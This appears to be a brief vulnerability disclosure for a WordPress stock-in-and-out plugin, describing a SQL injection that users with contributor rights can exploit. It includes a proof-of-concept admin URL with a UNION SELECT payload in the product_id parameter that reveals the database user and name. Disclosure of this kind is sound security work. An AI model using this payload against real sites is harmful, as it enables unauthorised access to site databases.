The plugin lacks proper sanitization before passing variables to an SQL request, making it vulnerable to SQL Injection attacks. Users with a role of contributor or higher can exploit this vulnerability.
https://www.example.com/wp-admin/admin.php?page=stock_in&product;_id=0+union+select+1%2C2%2C3%2Cuser()%2Cdatabase()%2C6%2C7%2C8%2C9%2C10&tab;=history
github.com/pang0lin/CVEproject/blob/main/wordpress_Stock-in-and-out_sqli.md